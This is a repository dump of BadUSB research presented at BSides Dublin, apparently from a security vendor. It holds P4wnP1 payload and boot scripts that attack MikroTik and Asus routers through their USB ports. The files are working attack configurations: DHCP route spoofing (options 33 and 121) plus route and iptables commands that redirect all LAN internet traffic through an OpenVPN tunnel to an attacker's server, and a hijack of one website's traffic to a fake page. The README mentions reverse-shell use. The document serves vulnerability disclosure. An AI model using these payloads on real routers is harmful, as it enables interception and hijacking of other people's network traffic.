Repository: tenable/router_badusb
Branch: master
Commit: fd77b854ea3b
Files: 7
Total size: 20.5 KB

Directory structure:
gitextract_z1ut4bt5/

├── .github/
│   └── CODEOWNERS
├── README.md
├── asus_bsides_routing_table/
│   ├── boot/
│   │   └── init_usb_ethernet.sh
│   └── payloads/
│       └── asus_bsides_routing_table.txt
├── mikrotik_mitm/
│   ├── boot/
│   │   └── init_usb_ethernet.sh
│   └── payloads/
│       └── mikrotik_mitm.txt
└── mikrotik_wan_lan_access/
    └── payloads/
        └── mikrotik_wan_lan_access.txt

================================================
FILE CONTENTS
================================================

================================================
FILE: .github/CODEOWNERS
================================================
* @tenable/zero-day @tenable/infosec


================================================
FILE: README.md
================================================
# BadUSB in Routers
Material found in this repository was originally presented at [BSides Dublin](https://www.bsidesdub.ie/) on March 23, 2019. The slides are included here in pdf format.

This repository contains configuration files for [P4wnP1](https://github.com/mame82/P4wnP1), a BadUSB framework for the Raspberry Pi. The configuration files allow an attacker to execute BadUSB style attacks on certain routers.

The following hardware and software were used for the BadUSB attacks:

* Raspberry Pi Zero
* USB-A Addon
* 8 GB microSD
* Raspbian Stretch (Version: November 2018)
* P4wnP1 (Version: [9c8cc09a6503f10309c04310c3bba9c07caab8b7](https://github.com/mame82/P4wnP1/tree/9c8cc09a6503f10309c04310c3bba9c07caab8b7))

<img src="/images/pi.jpg" height="25%" width="25%" />

---

## mikrotik_mitm

<img src="/images/mikrotik_pi.jpg" height="50%" width="50%" />

The mikrotik_mitm directory contains configuration files to man-in-the-middle outbound traffic from RouterOS LAN hosts. The configuration files were tested using RouterOS on an hAP using default configurations on 6.44.1 Stable. Presumably, it works on any RouterOS based router that supports 4g USB functionality. The attack will cause all internet bound traffic to be routed to the Raspberry Pi plugged into the USB port. The Pi will forward all of the internet traffic to a remote VPN server.

*PoC Video:*

[![PoC Video](http://img.youtube.com/vi/3X7xrgan5Tk/0.jpg)](http://www.youtube.com/watch?v=3X7xrgan5Tk)

As written the "remote" VPN server is at 192.168.1.64. If you are going to try this out for yourself, you'll need to adjust the openvpn connection and possibly the iptables / dhcp options depending on where your VPN server is. The VPN server configuration is fairly simple:

```sh
sudo sysctl -w net.ipv4.ip_forward=1
sudo openvpn --ifconfig 10.200.0.1 10.200.0.2 --dev tun --auth none
sudo iptables -I FORWARD -i tun0 -j ACCEPT
sudo iptables -I FORWARD -i tun0 -o ACCEPT
sudo iptables -t nat -A POSTROUTING -j MASQUERADE
```

<img src="/images/mitm_diagram.png" height="50%" width="50%" />

As mentioned, RouterOS will recognize the USB device using the default configuration. However! For some reason, the router won't recognize the Pi until you first plug in something else. You only have to do it once and then you are good until the router reboots. I'm not sure of the root cause of this. I've been using this ethernet adapter (you can find it on Amazon):

<img src="/images/usb_enet_adapter.jpg" height="25%" width="25%" />

---

## mikrotik_wan_lan_access

This is a non-mitm version of the MikroTik attack. The Pi will be assigned 192.168.4.1 and it should have access to both the WAN and LAN. LAN devices should also be able to reach the Pi. This is kind of useful if you just want to plug in your Pi as some type of local server... or if you want a reverse shell out to the internet.

---

## asus_bsides_routing_table

<img src="/images/asus_pi.jpg" height="50%" width="50%" />

The asus_bsides_routing_table directory contains configuration files to hijack traffic bound for http://securitybsides.com. The attack relies on the ability of the USB WAN to insert arbitrary entries into the router's routing table via DHCP options.

This attack was tested against an Asus RT-AC51U with load balancing dual WAN configured.

*PoC Video:*

[![PoC Video](http://img.youtube.com/vi/LvWo8fUaJdo/0.jpg)](http://www.youtube.com/watch?v=LvWo8fUaJdo)

---

## Traditional Attacks over IP

<img src="/images/netgear_pi.jpg" height="40%" width="40%" />

A variety of routers support printer sharing (Netgear, Linksys, and TP-Link). The way this works is that you plug your USB printer into the router and then you install client software on your LAN host which gives it the ability to talk to the printer via the router.

I've found that the router/client software will actually communicate with pretty much any USB device. For whatever reason, the device makers didn't limit the functionality to printers only.

As such, an attacker can execute any of the normal payloads that come with P4wnP1. In my PoC video, I'm using hid_keyboard2.txt. The downside to this attack is that it requires special software be installed and that the user actually click "connect".

*PoC Video:*

[![PoC Video](http://img.youtube.com/vi/aoaB6hiHGiM/0.jpg)](http://www.youtube.com/watch?v=aoaB6hiHGiM)


================================================
FILE: asus_bsides_routing_table/boot/init_usb_ethernet.sh
================================================
#!/bin/sh


#    This file is part of P4wnP1.
#
#    Copyright (c) 2017, Marcus Mengs. 
#
#    P4wnP1 is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    P4wnP1 is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with P4wnP1.  If not, see <http://www.gnu.org/licenses/>.


#
# Functions to init USB ethernet
#	- detect correct interface (ECM / RNDIS) --> exportet to $active_interface
#	- create dnsmasq DHCP configuration for interface



# =================================
# Network init
# =================================
function detect_active_interface()
{


	# Waiting for one of the interfaces to get a link (either RNDIS or ECM)
	#    loop count is limited by $RETRY_COUNT_LINK_DETECTION, to continue execution if this is used 
	#    as blocking boot script
	#    note: if the loop count is too low, windows may not have enough time to install drivers

	# ToDo: check if operstate could be used for this, without waiting for carrieer
	active_interface="none"

	# if RNDIS and ECM are active check which gets link first
	# Note: Detection for RNDIS (usb0) is done first. In case it is active, link availability
	#	for ECM (usb1) is checked anyway (in case both interfaces got link). This is done
	#	to use ECM as prefered interface on MacOS and Linux if both, RNDIS and ECM, are supported.
	if $USE_RNDIS && $USE_ECM; then
		# bring up both interfaces to check for physical link
		ifconfig usb0 up
		ifconfig usb1 up

		echo "CDC ECM and RNDIS active. Check which interface has to be used via Link detection"
		while [ "$active_interface" == "none" ]; do
		#while [[ $count -lt $RETRY_COUNT_LINK_DETECTION ]]; do
			printf "."

			if [[ $(</sys/class/net/usb0/carrier) == 1 ]]; then
				# special case: macOS/Linux Systems detecting RNDIS should use CDC ECM anyway
				# make sure ECM hasn't come up, too
				sleep 0.5
				if [[ $(</sys/class/net/usb1/carrier) == 1 ]]; then
					echo "Link detected on usb1"; sleep 2
					active_interface="usb1"
					ifconfig usb0 down

					break
				fi

				echo "Link detected on usb0"; sleep 2
				active_interface="usb0"
				ifconfig usb1 down

				break
			fi

			# check ECM for link
			if [[ $(</sys/class/net/usb1/carrier) == 1 ]]; then
				echo "Link detected on usb1"; sleep 2
				active_interface="usb1"
				ifconfig usb0 down

				break
			fi


			sleep 0.5
		done
	fi

	# if eiter one, RNDIS or ECM is active, wait for link on one of them
	if ($USE_RNDIS && ! $USE_ECM) || (! $USE_RNDIS && $USE_ECM); then 
		# bring up interface
		ifconfig usb0 up

		echo "CDC ECM or RNDIS active. Check which interface has to be used via Link detection"
		while [ "$active_interface" == "none" ]; do
			printf "."

			if [[ $(</sys/class/net/usb0/carrier) == 1 ]]; then
				echo "Link detected on usb0"; sleep 2
				active_interface="usb0"
				break
			fi
		done
	fi


	# setup active interface with correct IP
	if [ "$active_interface" != "none" ]; then
		ifconfig $active_interface $IF_IP netmask $IF_MASK
	fi


	# if active_interface not "none" (RNDIS or CDC ECM are running)
#	if [ "$active_interface" != "none" ]; then
#		# setup DHCP server
#		start_DHCP_server
#
#		# call onNetworkUp() from payload
#		declare -f onNetworkUp > /dev/null && onNetworkUp
#
#		# wait for client to receive DHCP lease
#		target_ip=""
#		while [ "$target_ip" == "" ]; do
#			target_ip=$(cat /tmp/dnsmasq.leases | cut -d" " -f3)
#		done
#
#		# call onNetworkUp() from payload
#		declare -f onTargetGotIP > /dev/null && onTargetGotIP
#	fi

}

function create_DHCP_config()
{
	# create DHCP config file for dnsmasq
	echo "P4wnP1: Creating DHCP configuration for Ethernet over USB..."

		cat <<- EOF > /tmp/dnsmasq_usb_eth.conf
			bind-interfaces
			port=0
			interface=$active_interface
			listen-address=$IF_IP
			dhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m

		EOF

		if $ROUTE_SPOOF; then
			cat <<- EOF >> /tmp/dnsmasq_usb_eth.conf
				# router
				dhcp-option=3,$IF_IP

				# DNS
				dhcp-option=6,$IF_IP

				# NETBIOS NS
				dhcp-option=44,$IF_IP
				dhcp-option=45,$IF_IP

				# static routes for 104.18.54.114 and 104.18.55.114
				dhcp-option=33,104.18.54.114,$IF_IP,104.18.55.114,$IF_IP
			EOF
		else
			cat <<- EOF >> /tmp/dnsmasq_usb_eth.conf
				# router disable DHCP gateway announcment
				dhcp-option=3

				# disable DNS settings
				dhcp-option=6
			EOF
		fi

		if $WPAD_ENTRY; then
			cat <<- EOF >> /tmp/dnsmasq_usb_eth.conf
				dhcp-option=252,http://$IF_IP/wpad.dat
			EOF
		fi

		cat <<- EOF >> /tmp/dnsmasq_usb_eth.conf
			dhcp-leasefile=/tmp/dnsmasq.leases
			dhcp-authoritative
			log-dhcp
		EOF

}

function start_DHCP_server()
{

	# recreate DHCP config
	if $ROUTE_SPOOF; then
		# DHCP config with static route spoofing
		cat <<- EOF > $wdir/dnsmasq.conf
			port=0
			listen-address=$IF_IP
			dhcp-range=$IF_DHCP_RANGE,$IF_MASK,1m
			dhcp-option=252,http://$IF_IP/wpad.dat

			# router
			dhcp-option=3,$IF_IP

			# DNS
			dhcp-option=6,$IF_IP

			# NETBIOS NS
			dhcp-option=44,$IF_IP
			dhcp-option=45,$IF_IP

			# static routes for 104.18.54.114 and 104.18.55.114
			dhcp-option=33,104.18.54.114,$IF_IP,104.18.55.114,$IF_IP

			dhcp-leasefile=/tmp/dnsmasq.leases
			dhcp-authoritative
			log-dhcp
		EOF
	else
		# DHCP config without static route spoofing
		cat <<- EOF > $wdir/dnsmasq.conf
			port=0
			listen-address=$IF_IP
			dhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m
			dhcp-option=252,http://$IF_IP/wpad.dat

			# router
			dhcp-option=3,$IF_IP

			# DNS
			dhcp-option=6,$IF_IP

			# NETBIOS NS
			dhcp-option=44,$IF_IP
			dhcp-option=45,$IF_IP

			dhcp-leasefile=/tmp/dnsmasq.leases
			dhcp-authoritative
			log-dhcp
		EOF
	fi;


	# start access point if needed
	if $WIFI && $ACCESS_POINT; then
		# start ACCESS POINT
		hostapd $wdir/wifi/hostapd.conf > /dev/null &
		# configure interface
		ifconfig wlan0 172.24.0.1 netmask 255.255.255.252
		# start DHCP server for WLAN interface and RNDIS/CDC ECM
		dnsmasq -C $wdir/dnsmasq.conf -C $wdir/wifi/dnsmasq_wifi.conf
	else

		# start DHCP server (listening on IF_IP)
		dnsmasq -C $wdir/dnsmasq.conf
	fi
}

================================================
FILE: asus_bsides_routing_table/payloads/asus_bsides_routing_table.txt
================================================
# USB VID & PID. See: http://www.linux-usb.org/usb.ids
USB_VID="0x1D6B"  # Linux Foundation
USB_PID="0x0103"  # NCM (Ethernet) Gadget

# Gadget features
USE_ECM=true     # if true CDC ECM will be enabled
USE_RNDIS=true   # if true RNDIS will be enabled
USE_HID=false    # if true HID (keyboard) will be enabled
USE_RAWHID=false # if true HID raw device will be enabled
USE_UMS=false    # if true USB Mass Storage will be enabled

# disable setting of static routes for all IPv4 addresses
ROUTE_SPOOF=true

# Network and DHCP options for Ethernet over USB
IF_IP="192.168.4.1" 
IF_MASK="255.255.255.252" 
IF_DHCP_RANGE="192.168.4.2,192.168.4.2"

function onNetworkUp()
{
	iptables -t nat -A PREROUTING -i usb1 -p tcp --dport 80 -j DNAT --to 192.168.4.1

	ip route add 0.0.0.0/0 dev $active_interface
	route add default gw 192.168.4.2

	mkdir /home/pi/html/
	cd /home/pi/html/
	echo "<html><body><h3>lol</h3></body></html>" > index.html
	python -m SimpleHTTPServer 80 &
}


================================================
FILE: mikrotik_mitm/boot/init_usb_ethernet.sh
================================================
#!/bin/sh


#    This file is part of P4wnP1.
#
#    Copyright (c) 2017, Marcus Mengs. 
#
#    P4wnP1 is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    P4wnP1 is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with P4wnP1.  If not, see <http://www.gnu.org/licenses/>.


#
# Functions to init USB ethernet
#	- detect correct interface (ECM / RNDIS) --> exportet to $active_interface
#	- create dnsmasq DHCP configuration for interface



# =================================
# Network init
# =================================
function detect_active_interface()
{


	# Waiting for one of the interfaces to get a link (either RNDIS or ECM)
	#    loop count is limited by $RETRY_COUNT_LINK_DETECTION, to continue execution if this is used 
	#    as blocking boot script
	#    note: if the loop count is too low, windows may not have enough time to install drivers

	# ToDo: check if operstate could be used for this, without waiting for carrieer
	active_interface="none"

	# if RNDIS and ECM are active check which gets link first
	# Note: Detection for RNDIS (usb0) is done first. In case it is active, link availability
	#	for ECM (usb1) is checked anyway (in case both interfaces got link). This is done
	#	to use ECM as prefered interface on MacOS and Linux if both, RNDIS and ECM, are supported.
	if $USE_RNDIS && $USE_ECM; then
		# bring up both interfaces to check for physical link
		ifconfig usb0 up
		ifconfig usb1 up

		echo "CDC ECM and RNDIS active. Check which interface has to be used via Link detection"
		while [ "$active_interface" == "none" ]; do
		#while [[ $count -lt $RETRY_COUNT_LINK_DETECTION ]]; do
			printf "."

			if [[ $(</sys/class/net/usb0/carrier) == 1 ]]; then
				# special case: macOS/Linux Systems detecting RNDIS should use CDC ECM anyway
				# make sure ECM hasn't come up, too
				sleep 0.5
				if [[ $(</sys/class/net/usb1/carrier) == 1 ]]; then
					echo "Link detected on usb1"; sleep 2
					active_interface="usb1"
					ifconfig usb0 down

					break
				fi

				echo "Link detected on usb0"; sleep 2
				active_interface="usb0"
				ifconfig usb1 down

				break
			fi

			# check ECM for link
			if [[ $(</sys/class/net/usb1/carrier) == 1 ]]; then
				echo "Link detected on usb1"; sleep 2
				active_interface="usb1"
				ifconfig usb0 down

				break
			fi


			sleep 0.5
		done
	fi

	# if eiter one, RNDIS or ECM is active, wait for link on one of them
	if ($USE_RNDIS && ! $USE_ECM) || (! $USE_RNDIS && $USE_ECM); then 
		# bring up interface
		ifconfig usb0 up

		echo "CDC ECM or RNDIS active. Check which interface has to be used via Link detection"
		while [ "$active_interface" == "none" ]; do
			printf "."

			if [[ $(</sys/class/net/usb0/carrier) == 1 ]]; then
				echo "Link detected on usb0"; sleep 2
				active_interface="usb0"
				break
			fi
		done
	fi


	# setup active interface with correct IP
	if [ "$active_interface" != "none" ]; then
		ifconfig $active_interface $IF_IP netmask $IF_MASK
	fi


	# if active_interface not "none" (RNDIS or CDC ECM are running)
#	if [ "$active_interface" != "none" ]; then
#		# setup DHCP server
#		start_DHCP_server
#
#		# call onNetworkUp() from payload
#		declare -f onNetworkUp > /dev/null && onNetworkUp
#
#		# wait for client to receive DHCP lease
#		target_ip=""
#		while [ "$target_ip" == "" ]; do
#			target_ip=$(cat /tmp/dnsmasq.leases | cut -d" " -f3)
#		done
#
#		# call onNetworkUp() from payload
#		declare -f onTargetGotIP > /dev/null && onTargetGotIP
#	fi

}

function create_DHCP_config()
{
	# create DHCP config file for dnsmasq
	echo "P4wnP1: Creating DHCP configuration for Ethernet over USB..."

		cat <<- EOF > /tmp/dnsmasq_usb_eth.conf
			bind-interfaces
			port=0
			interface=$active_interface
			listen-address=$IF_IP
			dhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m

		EOF

		if $ROUTE_SPOOF; then
			cat <<- EOF >> /tmp/dnsmasq_usb_eth.conf
				# router
				dhcp-option=3,$IF_IP

				dhcp-option=121,0.0.0.0/5,$IF_IP,8.0.0.0/7,$IF_IP,11.0.0.0/8,$IF_IP,12.0.0.0/6,$IF_IP,16.0.0.0/4,$IF_IP,32.0.0.0/3,$IF_IP,64.0.0.0/2,$IF_IP,128.0.0.0/2,$IF_IP,193.0.0.0/8,$IF_IP,194.0.0.0/7,$IF_IP,196.0.0.0/6,$IF_IP,200.0.0.0/5,$IF_IP,208.0.0.0/4,$IF_IP,224.0.0.0/4,$IF_IP,240.0.0.0/5,$IF_IP,248.0.0.0/6,$IF_IP
			EOF
		else
			cat <<- EOF >> /tmp/dnsmasq_usb_eth.conf
				# router disable DHCP gateway announcment
				dhcp-option=3

				# disable DNS settings
				dhcp-option=6
			EOF
		fi

		if $WPAD_ENTRY; then
			cat <<- EOF >> /tmp/dnsmasq_usb_eth.conf
				dhcp-option=252,http://$IF_IP/wpad.dat
			EOF
		fi

		cat <<- EOF >> /tmp/dnsmasq_usb_eth.conf
			dhcp-leasefile=/tmp/dnsmasq.leases
			dhcp-authoritative
			log-dhcp
		EOF

}

function start_DHCP_server()
{

	# recreate DHCP config
	if $ROUTE_SPOOF; then
		# DHCP config with static route spoofing
		cat <<- EOF > $wdir/dnsmasq.conf
			port=0
			listen-address=$IF_IP
			dhcp-range=$IF_DHCP_RANGE,$IF_MASK,1m
			dhcp-option=252,http://$IF_IP/wpad.dat

			# router
			dhcp-option=3,$IF_IP

			dhcp-option=121,0.0.0.0/5,$IF_IP,8.0.0.0/7,$IF_IP,11.0.0.0/8,$IF_IP,12.0.0.0/6,$IF_IP,16.0.0.0/4,$IF_IP,32.0.0.0/3,$IF_IP,64.0.0.0/2,$IF_IP,128.0.0.0/2,$IF_IP,193.0.0.0/8,$IF_IP,194.0.0.0/7,$IF_IP,196.0.0.0/6,$IF_IP,200.0.0.0/5,$IF_IP,208.0.0.0/4,$IF_IP,224.0.0.0/4,$IF_IP,240.0.0.0/5,$IF_IP,248.0.0.0/6,$IF_IP

			dhcp-leasefile=/tmp/dnsmasq.leases
			dhcp-authoritative
			log-dhcp
		EOF
	else
		# DHCP config without static route spoofing
		cat <<- EOF > $wdir/dnsmasq.conf
			port=0
			listen-address=$IF_IP
			dhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m
			dhcp-option=252,http://$IF_IP/wpad.dat

			# router
			dhcp-option=3,$IF_IP

			# DNS
			dhcp-option=6,$IF_IP

			# NETBIOS NS
			dhcp-option=44,$IF_IP
			dhcp-option=45,$IF_IP

			dhcp-leasefile=/tmp/dnsmasq.leases
			dhcp-authoritative
			log-dhcp
		EOF
	fi;


	# start access point if needed
	if $WIFI && $ACCESS_POINT; then
		# start ACCESS POINT
		hostapd $wdir/wifi/hostapd.conf > /dev/null &
		# configure interface
		ifconfig wlan0 172.24.0.1 netmask 255.255.255.252
		# start DHCP server for WLAN interface and RNDIS/CDC ECM
		dnsmasq -C $wdir/dnsmasq.conf -C $wdir/wifi/dnsmasq_wifi.conf
	else

		# start DHCP server (listening on IF_IP)
		dnsmasq -C $wdir/dnsmasq.conf
	fi
}

================================================
FILE: mikrotik_mitm/payloads/mikrotik_mitm.txt
================================================
# VID and PID stolen from a USB Ethernet Adapter
USB_VID="0x1D6B" # Vendor ID
USB_PID="0x0237" # Product ID

# Gadget features
USE_ECM=true      # if true CDC ECM will be enabled
USE_RNDIS=true    # if true RNDIS will be enabled
USE_HID=false     # if true HID (keyboard) will be enabled
USE_RAWHID=false  # if true HID raw device will be enabled
USE_UMS=false     # if true USB Mass Storage will be enabled

# add new entries to the router table (see: init_usb_ethernet.sh)
ROUTE_SPOOF=true

# assign self 192.168.4.1 and the router 192.168.4.2
IF_IP="192.168.4.1" 
IF_MASK="255.255.255.252" 
IF_DHCP_RANGE="192.168.4.2,192.168.4.2"

function onNetworkUp()
{
	# everything eventually goes to the router
	route add default gw 192.168.4.2

	# enable forwarding and be sure to ignore redirects
	sysctl net.ipv4.ip_forward=1
	sysctl net.ipv4.conf.all.accept_redirects = 0
	
	# connect to the VPN at 192.168.1.64
	openvpn --ifconfig 10.200.0.2 10.200.0.1 --dev tun --auth none --remote 192.168.1.64 --daemon

	# rewrite the src ip
	iptables -t nat -A POSTROUTING -j MASQUERADE

	# man in the middle most of the things (some obvious holes)
	route add -net 0.0.0.0/5 gw 10.200.0.2
	route add -net 8.0.0.0/7 gw 10.200.0.2
	route add -net 11.0.0.0/8 gw 10.200.0.2
	route add -net 12.0.0.0/6 gw 10.200.0.2
	route add -net 16.0.0.0/4 gw 10.200.0.2
	route add -net 32.0.0.0/3 gw 10.200.0.2
	route add -net 64.0.0.0/2 gw 10.200.0.2
	route add -net 128.0.0.0/2 gw 10.200.0.2
	route add -net 193.0.0.0/8 gw 10.200.0.2
	route add -net 194.0.0.0/7 gw 10.200.0.2
	route add -net 196.0.0.0/6 gw 10.200.0.2
	route add -net 200.0.0.0/5 gw 10.200.0.2
	route add -net 208.0.0.0/4 gw 10.200.0.2
	route add -net 224.0.0.0/4 gw 10.200.0.2
	route add -net 240.0.0.0/5 gw 10.200.0.2
	route add -net 248.0.0.0/6 gw 10.200.0.2
}


================================================
FILE: mikrotik_wan_lan_access/payloads/mikrotik_wan_lan_access.txt
================================================
# VID and PID stolen from a USB Ethernet Adapter
USB_VID="0x1D6B" # Vendor ID
USB_PID="0x0237" # Product ID

# Gadget features
USE_ECM=true      # if true CDC ECM will be enabled
USE_RNDIS=true    # if true RNDIS will be enabled
USE_HID=false     # if true HID (keyboard) will be enabled
USE_RAWHID=false  # if true HID raw device will be enabled
USE_UMS=false     # if true USB Mass Storage will be enabled

# Don't route extra traffic to the pi
ROUTE_SPOOF=false

# assign self 192.168.4.1 and the router 192.168.4.2
IF_IP="192.168.4.1" 
IF_MASK="255.255.255.252" 
IF_DHCP_RANGE="192.168.4.2,192.168.4.2"

function onNetworkUp()
{
	route add default gw 192.168.4.2
}